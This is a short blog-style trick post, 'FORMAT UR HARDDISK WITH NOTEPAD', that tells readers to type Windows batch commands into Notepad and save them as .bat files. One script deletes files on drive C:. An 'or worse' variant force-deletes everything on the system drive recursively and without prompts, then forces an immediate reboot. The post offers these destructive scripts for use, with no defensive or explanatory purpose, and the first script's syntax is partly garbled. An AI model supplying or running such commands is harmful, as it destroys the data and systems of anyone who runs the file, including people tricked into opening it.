FORMAT UR HARDDISK WITH NOTEPAD
Just Go To Notepad and then type code which is given below..
*******************************
@Echo off
Del C:\ *.*y
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
*********************************
No comments:
Post a Comment